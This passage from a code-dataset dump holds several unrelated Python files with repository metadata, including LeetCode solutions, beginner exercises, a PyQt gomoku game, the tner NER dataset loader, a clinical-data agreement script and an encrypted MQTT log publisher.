Solution(object):\n def monotoneIncreasingDigits(self, N):\n \"\"\"\n :type N: int\n :rtype: int\n \"\"\"\n li = [int(i) for i in str(N)]\n for i in range(len(li)-2, -1, -1):\n if li[i] <= li[i+1]:\n continue\n else:\n # set li[i] minus 1, and everything right to 9\n li[i] -= 1\n for j in range(i+1, len(li)):\n li[j] = 9\n while li[0] == 0:\n li.pop(0)\n return int(\"\".join([str(i) for i in li]))\n \n \n ","repo_name":"JerryHu1994/LeetCode-Practice","sub_path":"Solutions/738-Monotone-Increasing-Digits/python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} 
+{"seq_id":"7710420665","text":"import numpy as np\nimport pandas as pd\n\nreviewed = pd.read_excel(f'/share/fsmresfiles/breast_cancer_pregnancy/data/03_reviewed_erica_takahiro/takahiro_erica_reviewed_200.xlsx')\nmined = pd.read_csv(f'/share/fsmresfiles/breast_cancer_pregnancy/data/05_import_to_redcap/20220616_redcap_import_data.csv')\n\nreviewed['DOB'] = pd.to_datetime(reviewed['DOB'])\nmined['dob'] = pd.to_datetime(mined['dob'])\n\ndef match_patient(reviewed_sample, mined_df):\n # get reviewed data \n reviewed_dob = reviewed_sample['DOB']\n reviewed_mrn = reviewed_sample['MRN']\n reviewed_last_name = reviewed_sample['Patient Name'].split()[-1]\n # match to mined \n matched = mined_df.iloc[\n (reviewed_last_name==np.array([x.split()[-1] for x in mined_df['last_name'].values]))\n & (reviewed_mrn==mined_df['epic_mrn'].values)\n & (reviewed_dob==mined_df['dob']).values,\n :\n ]\n return matched\n\ndemo = {\n 'Age at Breast CA Dx' : 'age_at_diagnosis',\n}\n\ngyn = {\n 'Number Pregnancies (G)' : 'number_pregnancies', \n '# Live Births (P)' : 'number_births', \n 'Age at first pregnancy' : 'age_at_first_pregnancy',\n 'Age at most recent pregnancy' : 'age_at_most_recent_pregnancy',\n}\n\ntumor = {\n 'Histology (IDC, ILC, DCIS, other)' : 'histology',\n 'Tumor size (mm)' : 'tumor_size', \n 'Histologic grade (1-3)' : 'histologic_grade',\n 'ER status (pos/neg)' : 'er_status',\n 'PR status (pos/neg)' : 'pr_status', \n 'HER2Neu status (pos/neg/not performed)' : 'her2_status',\n 'Ki67 level (low/int/high/not performed)' : 'ki67',\n}\n\n# genetic = {\n# 'Genetic Testing Results' : '', # UNFORMATTED\n# }\n\nloss = pd.DataFrame(\n index=reviewed.index,\n columns=list(demo.values()) + list(gyn.values()) + list(tumor.values())\n)\n\nmissing = []\n\nfor i in loss.index:\n reviewed_sample = reviewed.loc[i,:]\n matched_mined = match_patient(reviewed_sample, mined)\n if matched_mined.shape[0]>0:\n # demo \n key = 'Age at Breast CA Dx'\n if ',' in str(reviewed_sample.loc[key]):\n loss.loc[i,demo[key]] = np.min([int(x) for x in reviewed_sample.loc[key].split(', ')]) - matched_mined.loc[:,demo[key]].values[0]\n elif pd.isnull(reviewed_sample.loc[key]):\n continue\n else:\n loss.loc[i,demo[key]] = reviewed_sample.loc[key]-matched_mined.loc[:,demo[key]].values[0]\n # gynecological \n for key in gyn.keys():\n loss.loc[i,gyn[key]] = reviewed_sample.loc[key]-matched_mined.loc[:,gyn[key]].values[0]\n # tumor size\n key = 'Tumor size (mm)'\n if str(reviewed_sample.loc[key]).startswith(', '):\n reviewed_sample.loc[key] = int(reviewed_sample.loc[key][2:])\n elif ',' in str(reviewed_sample.loc[key]):\n reviewed_sample.loc[key] = np.max([int(x) for x in reviewed_sample.loc[key].split(',')])\n loss.loc[i,tumor[key]] = reviewed_sample.loc[key]/10 - matched_mined.loc[:,tumor[key]].values[0]\n elif '/' in str(reviewed_sample.loc[key]):\n reviewed_sample.loc[key] = np.max([int(x) for x in reviewed_sample.loc[key].split('/')])\n loss.loc[i,tumor[key]] = reviewed_sample.loc[key]/10 - matched_mined.loc[:,tumor[key]].values[0]\n elif type(reviewed_sample.loc[key])==str:\n continue\n else:\n loss.loc[i,tumor[key]] = reviewed_sample.loc[key]/10 - matched_mined.loc[:,tumor[key]].values[0]\n # histology \n key = 'Histology (IDC, ILC, DCIS, other)'\n if pd.isnull(matched_mined.loc[:,tumor[key]].values[0]):\n continue\n else:\n matched_histology = {1:'IDC', 2:'ILC', 3:'DCIS', 4:'Other'}[matched_mined.loc[:,tumor[key]].values[0]]\n if reviewed_sample.loc[key]=='Mixed':\n loss.loc[i,tumor[key]] = 0\n else:\n loss.loc[i,tumor[key]] = 0 if 
matched_histology.lower() in reviewed_sample.loc[key].lower() else 1\n # grade \n key = 'Histologic grade (1-3)'\n if pd.isnull(matched_mined.loc[:,tumor[key]].values[0]):\n continue\n else:\n matched_grade = {1:'No histologic grade (DCIS)', 2:'1', 3:'2', 4:'3'}[matched_mined.loc[:,tumor[key]].values[0]]\n if 'DCIS' in reviewed_sample.loc['Histology (IDC, ILC, DCIS, other)']:\n loss.loc[i,tumor[key]] = 0\n else:\n loss.loc[i,tumor[key]] = 0 if matched_grade.lower() in str(reviewed_sample.loc[key]) else 1\n # er\n key = 'ER status (pos/neg)'\n if pd.isnull(matched_mined.loc[:,tumor[key]].values[0]):\n continue\n else:\n matched_er = {1:'Positive', 2:'Negative'}[matched_mined.loc[:,tumor[key]].values[0]].lower()\n loss.loc[i,tumor[key]] = 0 if str(reviewed_sample.loc[key]).lower() in matched_er else 1\n # pr\n key = 'PR status (pos/neg)'\n if pd.isnull(matched_mined.loc[:,tumor[key]].values[0]):\n continue\n else:\n matched_pr = {1:'Positive', 2:'Negative'}[matched_mined.loc[:,tumor[key]].values[0]].lower()\n loss.loc[i,tumor[key]] = 0 if str(reviewed_sample.loc[key]).lower() in matched_pr else 1\n # her2 \n key = 'HER2Neu status (pos/neg/not performed)'\n if pd.isnull(matched_mined.loc[:,tumor[key]].values[0]):\n continue\n else:\n matched_her2 = {1:'Positive', 2:'Negative', 3:'Not performed'}[matched_mined.loc[:,tumor[key]].values[0]].lower()\n loss.loc[i,tumor[key]] = 0 if str(reviewed_sample.loc[key]).lower()[-3:] in matched_her2 else 1\n # ki67\n key = 'Ki67 level (low/int/high/not performed)'\n if pd.isnull(matched_mined.loc[:,tumor[key]].values[0]):\n continue\n else:\n matched_ki67 = {1:'Low', 2:'Intermediate', 3:'High', 4:'Not performed'}[matched_mined.loc[:,tumor[key]].values[0]].lower()\n if ',' in str(reviewed_sample.loc[key]):\n loss.loc[i,tumor[key]] = 0 if np.any([x.strip() in matched_ki67 for x in str(reviewed_sample.loc[key]).lower().split(',')]) else 1\n elif '/' in str(reviewed_sample.loc[key]):\n loss.loc[i,tumor[key]] = 0 if np.any([x.strip() in matched_ki67 for x in str(reviewed_sample.loc[key]).lower().split('/')]) else 1\n else:\n loss.loc[i,tumor[key]] = 0 if str(reviewed_sample.loc[key]).lower() in matched_ki67 else 1\n else:\n missing.append(i)\n\nloss.to_csv('/home/srd6051/20230401_patient_agreement_test.csv')\n\nnp.mean(loss**2, axis=0)\n","repo_name":"sayadennis/recent-parity","sub_path":"05_data_summary/calculate_mining_review_agreement.py","file_name":"calculate_mining_review_agreement.py","file_ext":"py","file_size_in_byte":6531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"23233662850","text":"'''\nOs números primos possuem várias aplicações dentro da Computação, por exemplo na Criptografia.\n Um número primo é aquele que é divisível apenas por um e por ele mesmo. 
Faça um programa\n que peça um número inteiro e determine se ele\n é ou não um número primo.\n\n '''\n\ndef calte(numero):\n resto = (numero)\n mmc = 0\n for x in range(1,100):\n resto = (resto/x)\n if(round(resto)==resto):\n mmc+=1\n elif(round(resto) != resto):\n x+=1\n if(resto==1 or resto==0):\n break\n print(\"MMC\",mmc)\n if(mmc < 2 ):\n print(\"PRIMO\")\n else:\n print(\"não primo\")\n\nif __name__ == '__main__':\n entrada = int(input())\n calte(entrada)\n","repo_name":"YgorXavierS/ProjetoPython","sub_path":"Brasil Python/REPETIÇÃO/34.py","file_name":"34.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"24703801643","text":"import numpy as np\nimport torch, os, cv2, pickle\n\nfrom tqdm import tqdm\nfrom glob import glob\nimport pandas as pd\n\nfrom utils import load, levenshtein\nfrom inference import main as inference_initializer\nfrom inference import run as get_prediction\nfrom inference import args\n\ndef main(args):\n\tmodel, video_loader, lm, lm_tokenizer = inference_initializer(args)\n\n\ttotal_wer, total_cer, total_tokens, total_chars = 0., 0., 0., 0.\n\n\tdf = pd.read_csv(args.fpath)\n\tfnames = df[list(df.columns.values)[0]].tolist()\n\ttexts = df['transcript'].tolist()\n\n\tprog_bar = tqdm(list(zip(fnames, texts)))\n\tfor data in prog_bar:\n\t\tfname = data[0]\n\t\tif fname.endswith('.wav'): fname = fname[:-4]\n\t\tgt = data[1]\n\n\t\tfpath = f\"{args.videos_root}/{fname}.mp4\"\n\t\tpred = get_prediction(fpath, video_loader, model, \n\t\t\t\t\t\t\t\tlm, lm_tokenizer, display=False)\n\t\t\n\t\twer = levenshtein(gt.split(), pred.split())\n\t\tcer = levenshtein(list(gt), list(pred))\n\n\t\ttotal_wer += wer\n\t\ttotal_cer += cer\n\t\ttotal_tokens += len(gt.split())\n\t\ttotal_chars += len(list(gt))\n\n\t\tprog_bar.set_description('WER: {}, CER: {}'.format(\n\t\t\t\t\t\t\t\ttotal_wer / total_tokens, total_cer / total_chars))\n\nif __name__ == '__main__':\n\tmain(args)","repo_name":"prajwalkr/vtp","sub_path":"score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"44"} +{"seq_id":"1231902592","text":"from base import BasePlayer,Chess,is_win\nfrom PyQt5 import QtGui\nfrom PyQt5.QtGui import QPixmap\nfrom PyQt5.QtWidgets import QMessageBox,QLabel\n#生成逻辑棋盘\n#chessboard=[[None for i in range(0,19)] for j in range(0,19)]\nclass DoublePlayer(BasePlayer):\n def __init__(self,parent=None):\n super().__init__(parent)\n self.is_black=True\n self.chessboard=chessboard=[[None for i in range(0,19)] for j in range(0,19)]\n self.is_over=True\n self.restart_btn.clicked.connect(self.restart)\n self.win_label=None\n self.huiqi_btn.clicked.connect(self.huiqi)\n self.lose_btn.clicked.connect(self.lose)\n self.history=[]\n def restart(self):\n self.is_over=False\n if self.win_label is not None:\n self.win_label.close()\n for i in range(19):\n for j in range(19):\n if self.chessboard[j][i] is not None:\n self.chessboard[j][i].close()\n self.chessboard[j][i]=None\n def huiqi(self):\n\n if self.is_over:\n return\n a = self.history.pop()\n xx = a[0]\n yy = a[1]\n if self.chessboard[xx][yy] is not None:\n self.chessboard[xx][yy].close()\n self.chessboard[xx][yy] = None\n\n self.is_black = not self.is_black\n\n def lose(self):\n if self.is_over:\n return\n xx = self.history[::-1][0][0]\n yy = self.history[::-1][0][1]\n self.win_label = QLabel(self)\n if self.chessboard[xx][yy].color == 
'b':\n pic = QPixmap(\"photos/黑棋胜利.png\")\n else:\n pic = QPixmap(\"photos/白棋胜利.png\")\n self.win_label.setPixmap(pic)\n self.win_label.move(100, 100)\n self.win_label.show()\n self.is_over = True\n\n def mouseReleaseEvent(self, a0: QtGui.QMouseEvent):\n if self.is_over:\n return\n if a0.x() <40 or a0.x()>600:\n return\n if a0.y()<40 or a0.y()>600:\n return\n if self.is_black:\n self.chess=Chess(color='b',parent=self)\n else:\n self.chess = Chess(color='w', parent=self)\n #self.is_black=not self.is_black\n if (a0.x()-50)%30<=15:\n x=(a0.x()-50)//30*30+50\n else:\n x=((a0.x()-50)//30+1)*30+50\n if (a0.y() - 50) % 30 <= 15:\n y = (a0.y()-50) // 30 * 30 + 50\n else:\n y = ((a0.y() - 50) // 30 + 1) * 30 + 50\n xx =(x-50)//30\n yy =(y-50)//30\n\n\n if self.chessboard[xx][yy] is not None:\n return\n self.chessboard[xx][yy]=self.chess\n self.history.append([xx, yy])\n\n x=x-self.chess.width()/2\n y=y-self.chess.height()/2\n self.chess.move(x,y)\n self.chess.show()\n self.is_black = not self.is_black\n color = is_win(self.chessboard)\n\n if color is False:\n return\n else:\n #QMessageBox.information(self,\"消息\",\"{}棋胜利\".format(color))\n self.win_label =QLabel(self)\n if color=='b':\n pic =QPixmap(\"photos/黑棋胜利.png\")\n else:\n pic = QPixmap(\"photos/白棋胜利.png\")\n self.win_label.setPixmap(pic)\n self.win_label.move(100,100)\n self.win_label.show()\n self.is_over=True","repo_name":"yangzhiy/gobang","sub_path":"doubleplayer.py","file_name":"doubleplayer.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72800772292","text":"\"\"\" NER dataset \"\"\"\nimport os\nimport logging\nimport requests\nimport json\nimport hashlib\nfrom unicodedata import normalize\nfrom typing import Dict, List\nfrom itertools import chain\nfrom os.path import join as pj\n\nfrom datasets import load_dataset\n\nlogging.basicConfig(format='%(asctime)s %(levelname)-8s %(message)s', level=logging.INFO, datefmt='%Y-%m-%d %H:%M:%S')\nCACHE_DIR = f\"{os.path.expanduser('~')}/.cache/tner\"\nCHECKSUM_SHARED_LABEL = 'a6b6bbfd6ddf3f990ee6b335ade46429'\n\n\n__all__ = (\n \"get_dataset\",\n \"concat_dataset\",\n \"get_shared_label\"\n)\n\n\ndef get_shared_label(cache_dir: str = None):\n \"\"\" universal label set to unify the NER datasets\n\n @param cache_dir: cache directly\n @return: a dictionary mapping from label to id\n \"\"\"\n cache_dir = CACHE_DIR if cache_dir is None else cache_dir\n os.makedirs(cache_dir, exist_ok=True)\n url = f\"https://raw.githubusercontent.com/asahi417/tner/master/unified_label2id.json\"\n path = pj(cache_dir, \"unified_label2id.json\")\n if os.path.exists(path):\n with open(path, 'rb') as f:\n checksum = hashlib.md5(f.read()).hexdigest()\n if CHECKSUM_SHARED_LABEL == checksum:\n with open(path) as f:\n label2id = json.load(f)\n return label2id\n else:\n logging.warning('local `unified_label2id.json` has wrong checksum')\n with open(path, \"w\") as f:\n logging.info(f'downloading `unified_label2id.json` from {url}')\n r = requests.get(url)\n label2id = json.loads(r.content)\n json.dump(label2id, f)\n # file_checksum = hashlib.md5(open(path, 'rb').read()).hexdigest()\n # assert file_checksum == CHECKSUM_SHARED_LABEL,\\\n # f\"checksum inconsistency {file_checksum} != {CHECKSUM_SHARED_LABEL}\"\n return label2id\n\n\ndef get_hf_label2id(dataset, cache_dir: str = None):\n \"\"\" get `label2id` from TNER huggingface dataset https://huggingface.co/tner\n\n @param dataset: dataset name\n @param cache_dir: 
[optional] huggingface cache directly\n @return: a dictionary mapping from label to id\n \"\"\"\n url = f\"https://huggingface.co/datasets/tner/label2id/raw/main/files/{os.path.basename(dataset)}.json\"\n cache_dir = CACHE_DIR if cache_dir is None else cache_dir\n path = pj(cache_dir, f\"{dataset}.label2id.json\")\n os.makedirs(os.path.dirname(path), exist_ok=True)\n try:\n with open(path) as f:\n label2id = json.load(f)\n except Exception:\n with open(path, \"w\") as f:\n r = requests.get(url)\n label2id = json.loads(r.content)\n json.dump(label2id, f)\n return label2id\n\n\ndef get_hf_dataset(dataset: str = 'tner/conll2003',\n dataset_name: str = None,\n cache_dir: str = None,\n use_auth_token: bool = False):\n \"\"\" load dataset from TNER huggingface dataset https://huggingface.co/tner\n\n @param dataset: dataset alias on huggingface dataset hub\n @param dataset_name: [optional] dataset name to specify\n @param cache_dir: [optional] huggingface cache directly\n @return: (data, label2id)\n - data: a dictionary of {\"tokens\": [list of tokens], \"tags\": [list of tags]}\n - label2id: a dictionary mapping from label to id\n \"\"\"\n if dataset_name is not None:\n data = load_dataset(dataset, dataset_name, use_auth_token=use_auth_token)\n else:\n data = load_dataset(dataset, use_auth_token=use_auth_token)\n label2id = get_hf_label2id(dataset, cache_dir)\n data = {k: {\"tokens\": data[k][\"tokens\"], \"tags\": data[k][\"tags\"]} for k in data.keys()}\n return data, label2id\n\n\ndef load_conll_format_file(data_path: str, label2id: Dict = None):\n \"\"\" load dataset from local IOB format file\n\n @param data_path: path to iob file\n @param label2id: [optional] dictionary of label2id (generate from dataset as default )\n @return: (data, label2id)\n - data: a dictionary of {\"tokens\": [list of tokens], \"tags\": [list of tags]}\n - label2id: a dictionary mapping from label to id\n \"\"\"\n inputs, labels, seen_entity = [], [], []\n with open(data_path, 'r') as f:\n sentence, entity = [], []\n for n, line_raw in enumerate(f):\n line = normalize('NFKD', line_raw).strip()\n if len(line) == 0 or line.startswith(\"-DOCSTART-\"):\n if len(sentence) != 0:\n assert len(sentence) == len(entity)\n inputs.append(sentence)\n labels.append(entity)\n sentence, entity = [], []\n else:\n ls = line.split()\n if len(ls) < 2:\n if line_raw.startswith('O'):\n logging.warning(f'skip {ls} (line {n} of file {data_path}): '\n f'missing token (should be word and tag separated by '\n f'a half-space, eg. 
`London B-LOC`)')\n continue\n else:\n ls = ['', ls[0]]\n # Examples could have no label for mode = \"test\"\n word, tag = ls[0], ls[-1]\n sentence.append(word)\n entity.append(tag)\n\n if len(sentence) != 0:\n assert len(sentence) == len(entity)\n inputs.append(sentence)\n labels.append(entity)\n\n all_labels = sorted(list(set(list(chain(*labels)))))\n if label2id is None:\n label2id = {t: n for n, t in enumerate(all_labels)}\n else:\n labels_not_found = [i for i in all_labels if i not in label2id]\n if len(labels_not_found) > 0:\n logging.warning(f'found entities not in the label2id (label2id was updated):\\n\\t - {labels_not_found}')\n label2id.update({i: len(label2id) + n for n, i in enumerate(labels_not_found)})\n assert all(i in label2id for i in all_labels), \\\n f\"label2id is not covering all the entity \\n \\t- {label2id} \\n \\t- {all_labels}\"\n keys = label2id.copy().keys()\n for l in keys:\n if l.startswith('B'):\n entity = l[2:]\n if 'I-'+entity not in label2id:\n label2id.update({'I-'+entity: len(label2id)})\n logging.warning(f'found entities without I label2id (label2id was updated):\\n\\t - {entity}')\n labels = [[label2id[__l] for __l in _l] for _l in labels]\n data = {\"tokens\": inputs, \"tags\": labels}\n return data, label2id\n\n\ndef get_conll_format_dataset(local_dataset: Dict):\n \"\"\" load dataset from local IOB files\n\n @param local_dataset: a dictionary of paths to local BIO files eg.\n {\"train\": \"examples/local_dataset_sample/train.txt\", \"test\": \"examples/local_dataset_sample/test.txt\"}\n @return: (data, label2id)\n - data: a dictionary of {\"train\": {\"tokens\": [list of tokens], \"tags\": [list of tags]}}\n - label2id: a dictionary mapping from label to id\n \"\"\"\n data = {}\n label2id = None\n for file_name in sorted(local_dataset.keys()):\n file_path = local_dataset[file_name]\n assert os.path.exists(file_path), file_path\n _data, label2id = load_conll_format_file(file_path, label2id)\n data[file_name] = _data\n return data, label2id\n\n\ndef get_dataset_single(dataset: str = None,\n local_dataset: Dict = None,\n dataset_name: str = None,\n cache_dir: str = None,\n use_auth_token: bool = False):\n \"\"\" get NER dataset\n\n @param dataset: dataset name on huggingface tner organization (https://huggingface.co/datasets?search=tner)\n @param local_dataset: a dictionary of paths to local BIO files eg.\n {\"train\": \"examples/local_dataset_sample/train.txt\", \"test\": \"examples/local_dataset_sample/test.txt\"}\n @param dataset_name: [optional] data name of huggingface dataset\n @param cache_dir: [optional] cache directly\n @return: (data, label2id)\n - data: a dictionary of {\"train\": {\"tokens\": [list of tokens], \"tags\": [list of tags]}}\n - label2id: a dictionary mapping from label to id\n \"\"\"\n if dataset is not None:\n if local_dataset is not None:\n logging.warning(f\"local_dataset ({local_dataset}) is provided but ignored as dataset ({dataset}) is given\")\n data, label2id = get_hf_dataset(\n dataset, dataset_name=dataset_name, cache_dir=cache_dir, use_auth_token=use_auth_token\n )\n\n else:\n assert local_dataset is not None, \"need either of `dataset` or `local_dataset`\"\n data, label2id = get_conll_format_dataset(local_dataset)\n return data, label2id\n\n\ndef concat_dataset(list_of_data, cache_dir: str = None, label2id: Dict = None):\n \"\"\" concat multiple NER dataset with a unified label set\n\n @param list_of_data: a list of output from `get_dataset` eg. [(data_A, label2id_A), (data_B, label2id_B), ... 
]\n @param cache_dir: [optional] cache directly\n @param label2id: [optional] define label2id map\n @return: (data, label2id)\n - data: a dictionary of {\"train\": {\"tokens\": [list of tokens], \"tags\": [list of tags]}}\n - label2id: a dictionary mapping from label to id\n \"\"\"\n # unify label2id\n unified_label_set = get_shared_label(cache_dir)\n all_labels = []\n normalized_entities = {}\n for _, _label2id in list_of_data:\n all_labels += list(_label2id.keys())\n entities = set('-'.join(i.split('-')[1:]) for i in _label2id.keys() if i != 'O')\n for entity in entities:\n normalized_entity = [k for k, v in unified_label_set.items() if entity in v]\n assert len(normalized_entity) <= 1, f'duplicated entity found in the shared label set\\n {normalized_entity} \\n {entity}'\n if len(normalized_entity) == 0:\n # logging.warning(f'Entity `{entity}` is not found in the shared label set {unified_label_set}. '\n # f'Original entity (`{entity}`) will be used as label.')\n normalized_entities[entity] = entity\n else:\n normalized_entities[entity] = normalized_entity[0]\n all_labels = sorted([i for i in set(all_labels) if i != \"O\"])\n normalized_labels = [f\"{i.split('-')[0]}-{normalized_entities['-'.join(i.split('-')[1:])]}\" for i in all_labels]\n normalized_labels = list(set(normalized_labels))\n # input(normalized_labels)\n if label2id is not None:\n assert all(i in label2id.keys() for i in normalized_labels),\\\n f\"missing entity in label2id {label2id.keys()}: {normalized_labels}\"\n normalized_label2id = label2id\n else:\n normalized_label2id = {k: n for n, k in enumerate(sorted(normalized_labels))}\n normalized_label2id.update({\"O\": len(normalized_label2id)})\n # input(normalized_label2id)\n\n # update labels & concat data\n concat_tokens = {}\n concat_tags = {}\n for data, _label2id in list_of_data:\n id2label = {v: k for k, v in _label2id.items()}\n for _split in data.keys():\n if _split not in concat_tokens:\n concat_tokens[_split] = []\n concat_tags[_split] = []\n concat_tokens[_split] += data[_split]['tokens']\n for tags in data[_split]['tags']:\n normalized_tag = []\n for t in tags:\n if id2label[t] != 'O':\n t = f\"{id2label[t].split('-')[0]}-{normalized_entities['-'.join(id2label[t].split('-')[1:])]}\"\n else:\n t = id2label[t]\n normalized_tag.append(normalized_label2id[t])\n concat_tags[_split].append(normalized_tag)\n\n # sanity check\n assert concat_tags.keys() == concat_tokens.keys(), f\"{concat_tags.keys()} != {concat_tokens.keys()}\"\n for s in concat_tags.keys():\n assert len(concat_tags[s]) == len(concat_tokens[s]), f\"{len(concat_tags[s])} != {len(concat_tokens[s])}\"\n assert all(len(a) == len(b) for a, b in zip(concat_tags[s], concat_tokens[s]))\n data = {s: {\"tokens\": concat_tokens[s], \"tags\": concat_tags[s]} for s in concat_tags.keys()}\n return data, normalized_label2id\n\n\ndef get_dataset(dataset: List or str = None,\n local_dataset: List or Dict = None,\n dataset_name: List or str = None,\n concat_label2id: Dict = None,\n cache_dir: str = None,\n use_auth_token: bool = False):\n \"\"\" get NER datasets (concat mutiple datasets)\n\n @param dataset: dataset name (or a list of it) on huggingface tner organization (https://huggingface.co/datasets?search=tner)\n (eg. 
\"tner/conll2003\", [\"tner/conll2003\", \"tner/ontonotes5\"]]\n @param local_dataset: a dictionary (or a list) of paths to local BIO files eg.\n {\"train\": \"examples/local_dataset_sample/train.txt\", \"test\": \"examples/local_dataset_sample/test.txt\"}\n @param dataset_name: [optional] data name of huggingface dataset (should be same length as the `dataset`)\n @param concat_label2id: [optional] define label2id map for multiple dataset concatenation (nothing to do with single data)\n @param cache_dir: [optional] cache directly\n @return: (data, label2id)\n - data: a dictionary of {\"train\": {\"tokens\": [list of tokens], \"tags\": [list of tags]}}\n - label2id: a dictionary mapping from label to id\n \"\"\"\n assert dataset is not None or local_dataset is not None, \"`datasets` or `local_datasets` should be provided\"\n dataset_list = []\n # load huggingface dataset\n if dataset is not None:\n if type(dataset) is str:\n assert dataset_name is None or type(dataset_name) is str, \\\n f\"`dataset_name` should be string but given {dataset_name}\"\n data, label2id = get_dataset_single(\n dataset=dataset, dataset_name=dataset_name, cache_dir=cache_dir, use_auth_token=use_auth_token)\n dataset_list.append((data, label2id))\n else:\n assert dataset_name is None or (\n type(dataset_name) is list and\n len(dataset) == len(dataset_name)), \\\n f\"dataset_name not matched: {dataset} vs {dataset_name}\"\n for n, d in enumerate(dataset):\n data, label2id = get_dataset_single(\n dataset=d,\n dataset_name=dataset_name[n] if dataset_name is not None else None,\n cache_dir=cache_dir\n )\n dataset_list.append((data, label2id))\n # load custom dataset\n if local_dataset is not None:\n if type(local_dataset) is dict:\n data, label2id = get_dataset_single(local_dataset=local_dataset, cache_dir=cache_dir)\n dataset_list.append((data, label2id))\n else:\n for d in local_dataset:\n data, label2id = get_dataset_single(local_dataset=d, cache_dir=cache_dir)\n dataset_list.append((data, label2id))\n # concat datasets\n if len(dataset_list) > 1:\n logging.info(f'concat {len(dataset_list)} datasets')\n data, label2id = concat_dataset(dataset_list, label2id=concat_label2id, cache_dir=cache_dir)\n else:\n if concat_label2id is not None:\n logging.warning(f'concat_label2id is specified {concat_label2id} but not changed as is only one dataset')\n data, label2id = dataset_list[0]\n return data, label2id\n","repo_name":"asahi417/tner","sub_path":"tner/get_dataset.py","file_name":"get_dataset.py","file_ext":"py","file_size_in_byte":15418,"program_lang":"python","lang":"en","doc_type":"code","stars":332,"dataset":"github-code","pt":"44"} +{"seq_id":"24450285289","text":"#!/usr/bin/python\n\nimport paho.mqtt.publish as publish\nimport subprocess\nimport os, sys, logging\nfrom tailf import tailf\nfrom aes_cipher import AESCipher\nfrom config import *\n\n\n# logger configuration\nLOGGING_FILE = 'mqtt-pub.log'\nlogging.basicConfig(\n # filename=LOGGING_FILE,\n level=logging.DEBUG,\n format='%(asctime)s [%(levelname)s] %(filename)s_%(lineno)d : %(message)s')\nlogger = logging.getLogger('root')\n\n\ndef main():\n logger.debug(\"AUGPAKE_SERVER_IP: {}\".format(AUGPAKE_SERVER_IP))\n logger.debug(\"AUGPAKE_SERVER_PORT: {}\".format(AUGPAKE_SERVER_PORT))\n logger.debug(\"MQTT_BROKER_IP: {}\".format(MQTT_BROKER_IP))\n logger.debug(\"MQTT_BROKER_PORT: {}\".format(MQTT_BROKER_PORT))\n\n try:\n ID, Key = getKeyByAugPake(AUGPAKE_SERVER_IP, AUGPAKE_SERVER_PORT)\n except (OSError, IndexError) as e:\n logger.error(e)\n Key = None\n\n if Key is 
None:\n logger.error(\"Key is None. Exit...\")\n exit()\n\n # create cipher\n cipher = AESCipher(Key)\n\n for line in tailf(WATCH_FILE):\n logger.debug(\"Plain Text: {}\".format(line))\n encrypt_ctx = cipher.encrypt(line)\n prefix_encrypt = ID + SEP + encrypt_ctx;\n logger.debug(\"Encrypt Text prefixed ID: {}\".format(prefix_encrypt))\n publish.single(MQTT_TOPIC, prefix_encrypt, hostname=MQTT_BROKER_IP, port=MQTT_BROKER_PORT)\n\n\ndef getKeyByAugPake(ip, port):\n \"\"\"\n Return (id, key) pair\n \"\"\"\n work_dir = os.path.abspath(os.path.dirname(sys.argv[0])) + \"/../augpake_src/client/\"\n out = subprocess.check_output([\"./s_client\", ip, port], cwd=work_dir)\n id = out.split(\"-\")[0].strip()\n key = out.split(\"-\")[1].strip()\n if id:\n logger.info(\"Session ID: {}\".format(id))\n logger.info(\"Session KEY: {}\".format(key))\n return id, key\n else:\n # If something wrong, return (None, None)\n return None, None\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ogre0403/NCHC-AIST-Joint-Project","sub_path":"mqtt-python/mqtt-pub.py","file_name":"mqtt-pub.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"73205989253","text":"class Solution:\n def convert(self, s: str, numRows: int) -> str:\n n = numRows\n if n == 1: \n return s\n rows = ['' for _ in range(n)]\n j, d = 0, 1\n for i in range(len(s)):\n # add the current character to corresponding row\n rows[j] += s[i]\n # if it reaches to the last row, we need to go up\n if j == n - 1: \n d = -1\n # if it reaches to the first row, we need to go down\n elif j == 0: \n d = 1\n # move j pointer\n j += d\n \n return ''.join(rows)","repo_name":"RishabhRathi-Dev/DSA-Practice","sub_path":"DSA Practice/LeetCode/6. 
Zigzag Conversion/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"36279624844","text":"\"\"\"\r\nfrase = str(input('Digite uma frase: ')).lower().replace(' ', '').strip()\r\n\r\nf = frase[::-1].lower().replace(' ', '')\r\n\r\nif f == frase:\r\n print('É um palíndromo')\r\nelse:\r\n print(f'{frase} não é um palíndromo')\r\n print('Erro')\r\n\r\n\"\"\"\r\n\r\nfrase = str(input('Digite uma frase: ')).strip().upper()\r\npalavras = frase.split()\r\njunto = ''.join(palavras)\r\ninverso = ''\r\nfor letra in range(len(junto) - 1, -1, -1):\r\n inverso += junto[letra]\r\nprint(f'O inverso de {junto} é {inverso}')\r\nif inverso == junto:\r\n print('Temos um palíndromo')\r\nelse:\r\n print('A frase digitada não é um palíndromo!')\r\n","repo_name":"hianp/Exercicios_Curso_em_video_Py","sub_path":"Ex053.py","file_name":"Ex053.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"21409689520","text":"import pandas\nimport os\nfrom collections import defaultdict\nimport sys\nimport argparse\nimport numpy\nimport pathlib\nfrom lib.dorotheadb import *\nfrom lib.calculate_stats import *\nfrom scipy.stats import nchypergeom_wallenius, hypergeom, rankdata\nimport json\n\nparser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\nparser.add_argument(\"-db\", \"--database\", help=\"select level of confidence for dorothea\", default=\"C\")\nparser.add_argument(\"-org\", 